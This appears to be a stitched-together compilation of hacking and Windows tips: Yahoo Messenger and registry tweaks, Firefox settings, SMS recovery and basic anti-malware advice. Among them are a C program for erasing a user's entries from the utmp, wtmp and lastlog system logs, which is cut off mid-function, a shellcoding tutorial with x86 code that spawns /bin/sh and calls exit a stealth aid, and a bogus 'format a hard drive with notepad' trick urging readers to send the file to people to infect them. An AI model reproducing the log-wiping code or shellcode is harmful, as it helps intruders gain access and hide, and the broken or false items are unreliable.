use Yahoo! with NO AD's

I went into the system registery and found out that Yahoo! moved the 'banner url' key to a slightly different location. Than what it used in version 5.5!

Yahoo! IM no longer uses 'YUrl', but uses 'View' instead. You gotta click on each key inside of 'View' and edit the 'banner url' string to anything you want... I simply cleared mine out completely and it works flawlessly!

Here is what you gotta do:

Run regedit
Goto HKEY_CURRENT_USER -> Software -> Yahoo -> Pager -> View

Inside the 'View' key there are a several other keys... go through each one and edit the 'banner url' string to your liking. It even works if the string is left blank (this causes it to look as if ads were never even implemented)!

Restart Yahoo! IM for the effect to take hold.

This is great for Yahoo!

Firefox Speed Tweaks

Yes, firefox is already pretty damn fast but did you know that you can tweak it and improve the speed even more?

That's the beauty of this program being open source.
Here's what you do:
In the URL bar, type “about:config” and press enter. This will bring up the configuration “menu” where you can change the parameters of Firefox.

Note that these are what I’ve found to REALLY speed up my Firefox significantly - and these settings seem to be common among everybody else as well. But these settings are optimized for broadband connections - I mean with as much concurrent requests we’re going to open up with pipelining… lol… you’d better have a big connection.

Double Click on the following settins and put in the numbers below - for the true / false booleans - they’ll change when you double click.

Code:
browser.tabs.showSingleWindowModePrefs – true
network.http.max-connections – 48
network.http.max-connections-per-server – 16
network.http.max-persistent-connections-per-proxy – 8
network.http.max-persistent-connections-per-server – 4
network.http.pipelining – true
network.http.pipelining.maxrequests – 100
network.http.proxy.pipelining – true
network.http.request.timeout – 300


One more thing… Right-click somewhere on that screen and add a NEW -> Integer. Name it “nglayout.initialpaint.delay” and set its value to “0”. This value is the amount of time the browser waits before it acts on information it receives. Since you’re broadband - it shouldn’t have to wait.

Now you should notice you’re loading pages MUCH faster now!

Erasing Your Presence From System Logs

Edit /etc/utmp, /usr/adm/wtmp and /usr/adm/lastlog. These are not text files that can be edited by hand with vi, you must use a program specifically written for this purpose.

Example:

#include
#include
#include
#include
#include
#include
#include
#include
#define WTMP_NAME "/usr/adm/wtmp"
#define UTMP_NAME "/etc/utmp"
#define LASTLOG_NAME "/usr/adm/lastlog"
int f;
void kill_utmp(who)
char *who;
{
struct utmp utmp_ent;
if ((f=open(UTMP_NAME,O_RDWR))>=0) {
while(read (f, &utmp_ent, sizeof (utmp_ent))> 0 )
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof( utmp_ent ));
lseek (f, -(sizeof (utmp_ent)), SEEK_CUR);
write (f, &utmp_ent, sizeof (utmp_ent));
}
close(f);
}
}
void kill_wtmp(who)
char *who;
{
struct utmp utmp_ent;
long pos;
pos = 1L;
if ((f=open(WTMP_NAME,O_RDWR))>=0) {
while(pos != -1L) {
lseek(f,-(long)( (sizeof(struct utmp)) * pos),L_XTND);
if (read (f, &utmp_ent, sizeof (struct utmp))<0) {
pos = -1L;
} else
{
if (!strncmp(utmp_ent.ut_name,who,strlen(who))) {
bzero((char *)&utmp_ent,sizeof(struct utmp ));
lseek(f,-( (sizeof(struct utmp)) * pos),L_XTND);
write (f, &utmp_ent, sizeof (utmp_ent));
pos = -1L;
} else pos += 1L;
}
}
close(f);
}
}
void kill_lastlog(who)
char *who;
{
struct passwd *pwd;
struct lastlog newll;
if ((pwd=getpwnam(who))!=NULL)
{
you r DONE!

Advanced Shellcoding Techniques

This paper assumes a working knowledge of basic shellcoding techniques, and x86 assembly, I will not rehash these in this paper. I hope to teach you some of the lesser known shellcoding techniques that I have picked up, which will allow you to write smaller and better shellcodes. I do not claim to have invented any of these techniques, except for the one that uses the div instruction.

The multiplicity of mul

This technique was originally developed by Sorbo of darkircop.net. The mul instruction may, on the surface, seem mundane, and it's purpose obvious. However, when faced with the difficult challenge of shrinking your shellcode, it proves to be quite useful. First some background information on the mul instruction itself.

mul performs an unsigned multiply of two integers. It takes only one operand, the other is implicitly specified by the %eax register. So, a common mul instruction might look something like this:

movl $0x0a,%eax
mul $0x0a

This would multiply the value stored in %eax by the operand of mul, which in this case would be 10*10. The result is then implicitly stored in EDX:EAX. The result is stored over a span of two registers because it has the potential to be considerably larger than the previous value, possibly exceeding the capacity of a single register(this is also how floating points are stored in some cases, as an interesting sidenote).

So, now comes the ever-important question. How can we use these attributes to our advantage when writing shellcode? Well, let's think for a second, the instruction takes only one operand, therefore, since it is a very common instruction, it will generate only two bytes in our final shellcode. It multiplies whatever is passed to it by the value stored in %eax, and stores the value in both %edx and %eax, completely overwriting the contents of both registers, regardless of whether it is necessary to do so, in order to store the result of the multiplication. Let's put on our mathematician hats for a second, and consider this, what is the only possible result of a multiplication by 0? The answer, as you may have guessed, is 0. I think it's about time for some example code, so here it is:

xorl %ecx,%ecx
mul %ecx

What is this shellcode doing? Well, it 0's out the %ecx register using the xor instruction, so we now know that %ecx is 0. Then it does a mul %ecx, which as we just learned, multiplies it's operand by the value in %eax, and then proceeds to store the result of this multiplication in EDX:EAX. So, regardless of %eax's previous contents, %eax must now be 0. However that's not all, %edx is 0'd now too, because, even though no overflow occurs, it still overwrites the %edx register with the sign bit(left-most bit) of %eax. Using this technique we can zero out three registers in only three bytes, whereas by any other method(that I know of) it would have taken at least six.

The div instruction

Div is very similar to mul, in that it takes only one operand and implicitly divides the operand by the value in %eax. Also like, mul it stores the result of the divide in %eax. Again, we will require the mathematical side of our brains to figure out how we can take advantage of this instruction. But first, let's think about what is normally stored in the %eax register. The %eax register holds the return value of functions and/or syscalls. Most syscalls that are used in shellcoding will return -1(on failure) or a positive value of some kind, only rarely will they return 0(though it does occur). So, if we know that after a syscall is performed, %eax will have a non-zero value, and that the instruction divl %eax will divide %eax by itself, and then store the result in %eax, we can say that executing the divl %eax instruction after a syscall will put the value 1 into %eax. So...how is this applicable to shellcoding? Well, their is another important thing that %eax is used for, and that is to pass the specific syscall that you would like to call to int $0x80. It just so happens that the syscall that corresponds to the value 1 is exit(). Now for an example:


xorl %ebx,%ebx
mul %ebx
push %edx
pushl $0x3268732f
pushl $0x6e69622f
mov %esp, %ebx
push %edx
push %ebx
mov %esp,%ecx
movb $0xb, %al #execve() syscall, doesn't return at all unless it fails, in which case it returns -1
int $0x80

divl %eax # -1 / -1 = 1
int $0x80

Now, we have a 3 byte exit function, where as before it was 5 bytes. However, there is a catch, what if a syscall does return 0? Well in the odd situation in which that could happen, you could do many different things, like inc %eax, dec %eax, not %eax anything that will make %eax non-zero. Some people say that exit's are not important in shellcode, because your code gets executed regardless of whether or not it exits cleanly. They are right too, if you really need to save 3 bytes to fit your shellcode in somewhere, the exit() isn't worth keeping. However, when your code does finish, it will try to execute whatever was after your last instruction, which will most likely produce a SIG ILL(illegal instruction) which is a rather odd error, and will be logged by the system. So, an exit() simply adds an extra layer of stealth to your exploit, so that even if it fails or you can't wipe all the logs, at least this part of your presence will be clear.

Unlocking the power of leal

The leal instruction is an often neglected instruction in shellcode, even though it is quite useful. Consider this short piece of shellcode.

xorl %ecx,%ecx
leal 0x10(%ecx),%eax

This will load the value 17 into eax, and clear all of the extraneous bits of eax. This occurs because the leal instruction loads a variable of the type long into it's desitination operand. In it's normal usage, this would load the address of a variable into a register, thus creating a pointer of sorts. However, since ecx is 0'd and 0+17=17, we load the value 17 into eax instead of any kind of actual address. In a normal shellcode we would do something like this, to accomplish the same thing:

xorl %eax,%eax
movb $0x10,%eax

I can hear you saying, but that shellcode is a byte shorter than the leal one, and you're quite right. However, in a real shellcode you may already have to 0 out a register like ecx(or any other register), so the xorl instruction in the leal shellcode isn't counted. Here's an example:

xorl %eax,%eax
xorl %ebx,%ebx
movb $0x17,%al
int $0x80

xorl %ebx,%ebx
leal 0x17(%ebx),%al
int $0x80

Both of these shellcodes call setuid(0), but one does it in 7 bytes while the other does it in 8. Again, I hear you saying but that's only one byte it doesn't make that much of a difference, and you're right, here it doesn't make much of a difference(except for in shellcode-size pissing contests =p), but when applied to much larger shellcodes, which have many function calls and need to do things like this frequently, it can save quite a bit of space.

Conclusion

I hope you all learned something, and will go out and apply your knowledge to create smaller and better shellcodes. If you know who invented the leal technique, please tell me and I will credit him/her.

REMOVING SERVICES DEPENDENCIES.!!

This will allow you to disable a service or uninstall it from your system without effecting another service that depends on it. Here's how you do it
1. After you have set your services the way you want them and you have disabled/uninstalled something that another services depends on, run "regedit"
2. Under HKEY_LOCAL_MACHINE\System\find the service that will not function, do to another service being disabled/uninstall (found in ControlSet001\Services, ControlSet002\Services, and CurrentControlSet\Services)
3. Once you have found the service right-click on the string value, "DependOnService,"and modify
4. You should now see a list of services that it is dependent on. Simply delete the service that you have disabled/uninstalled
5. Restart your computer and your ready to go Disclaimer REMEMBER TO BACKUP YOU REGISTRY FIRST I'm not totaly sure if this will have any negative effects on your system. I used this method after uninstalling "Netbios over Tcpip" from my system completely, so that my Dhcp service would function and I have had NO negative effects on my system.

Can u Delete Recycle Bin?

1 thing is 4 sure, delete option can be added 2 recycle bin...
the old registry thing will work out.....
* launch d registry...
* open HKEY_CLASSES_ROOT\CLSID\{645FF040-5081-101B-9F08-00AA002F954E}\ShellFolder
* to add a rename and delete option, change the Dword attribute to 70 01 00 20
* refresh and reboot the system..... u r done.

PS: always backup ur data as well as registry b4 attempting 2 work on it if u r a newbie....

How to remove recycle bin from your desktop Tip

Open Regedit by going to START - RUN and type Regedit and hit enter. Then you should navigate to following entry in registry HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\
Desktop\NameSpace\{645FF040-5081-101B-9F08-00AA002F954E} and delete it. This action should remove recycle bin from your desktop.

A SMS once deleted can’t be read again

….but sometimes we hurrily delete some important SMS Here is the technique that must be followed to retrieve deleted SMS.Required utility:
1) Any system explorer or file explorer program (eg. fileman or fexplorer.provided with the package)
Step 1) Open Fexplorer
Step2) Select drive C: or D: depending on the memory in which the Sms messages have been saved.
Step 3) For example u selected c: , Then open “system” folder.
step 4) Then in “system” folder open “mail” folder.
step 5) Then in this folder u will see different folders (eg 0010001_s) and certain files (eg 00100000). These files are the actual messages. Browse through every folder and open all
files till u get the sms u are looking for.
Step 6) For opening the files don’t choose options>file>open as it will show format not supported rather choose options>file>hex/text viewer.By selecting the “Hex/ text viewer” u ll be able to open and read the deleted SMS message

Protect Urself ! Follow These Simple Guidelines n u are done

*** Under the security option tab of Mozilla Firefox there is an option Show Passwords make sure its protected by the master password.


1. U may avoid using Internet Explorer(old versions) and make the switch to Opera, it's more secure, plain and simple.

2. Get Spybot Search and Destroy or Spyware Doctor and immediately update it.

3. Get Adaware SE and immediately update it.
(Use both as a 1-2 punch on infected client computers and between the two there's not much they won't kill)

4. Update your anti virus,

5. Boot into safe mode and run all three scans (once in a month)

6. While the scans are going check your registry (Click start --> Run and type regedit to get intot he registry) and look in HKEY_CurrentUser/software/microsoft/windows/currentversion/run & HKEY_Local_Machine/software/microsoft/windows/currentversion/run. Verify that all programs listed are legitimate and wanted.

7. If or when your antivirus scan comes across anything, search for that file name in your registry and delete it, at least quarantine it.

8. Use explorer to go to the windows/system32 folder and sort by date. If you haven't already done so, make sure you can see the entire file names. click Tools --> Folder Options and unclick the box labeled "Hide extensions for known file types" and under Hidden files and folders click "Show hidden files and folders." However, make sure you choose "Hide protected operating system files" so you don't accidentally remove anything that would cripple your computer.. You are looking for recent files with names ending with .exe and .dll that look suspicious. Major culprits will have gibberish names such as alkjdlkjfa.exe.

9. Once you can get clean scans in safe mode, reboot in normal mode and scan all over again. If you can't get a clean scan in regular mode then you have something more persistant that could take more research.

10. Make sure your firewall doesn't have strange exceptions.

11. If you suspect anything that is going wrong with your computer is the action of a stalker, on a more secure system change all your major passwords, mostly bu using a virtual keyboard(to prevent keyloggers).

12. If your system has been specifically targeted and hacked you can never be 100% sure that your system is no longer compromised so start with 11, make backups of personal files on the infected system and format and re-install Windows.

Good luck!

Format a HDD with notepad

Step 1.
Copy The Following In Notepad Exactly as it says
01001011000111110010010101010101010000011111100000
Step 2.
Save As An EXE Any Name Will Do
Step 3.
Send the EXE to People And Infect

muneer's suggestion is not to try this on your own system

try these a your own risk

Yahoo Messenger multiple logins

Yahoo Messenger trick-How to open Multiple Yahoo Messenger in one system at a time?is it possible!!!
yes!!its possible..check it out

1. Go to start > Run > Type regedit > Press Enter
2. Click on the plus sign near the folder HKEY_CURRENT_USER
3. Click on the plus sign near the folder Software
4. Click on the plus sign near the folder Yahoo
5. Click on the plus sign near the folder Pager
6. Right Click on the folder name Test > New > DWORD Value
7. Right side you will get a file named New Value #1
8. Right Click on the file New Value #1 and Rename it as Plural and press enter
9. Double Click on the file Plural
10. You will get a windown named Edit DWORD Value
11. Type 1 inside 'Select the Value data' and press enter
12. Close the registery editor window
13. Now you can launch multiple windows and use different ID's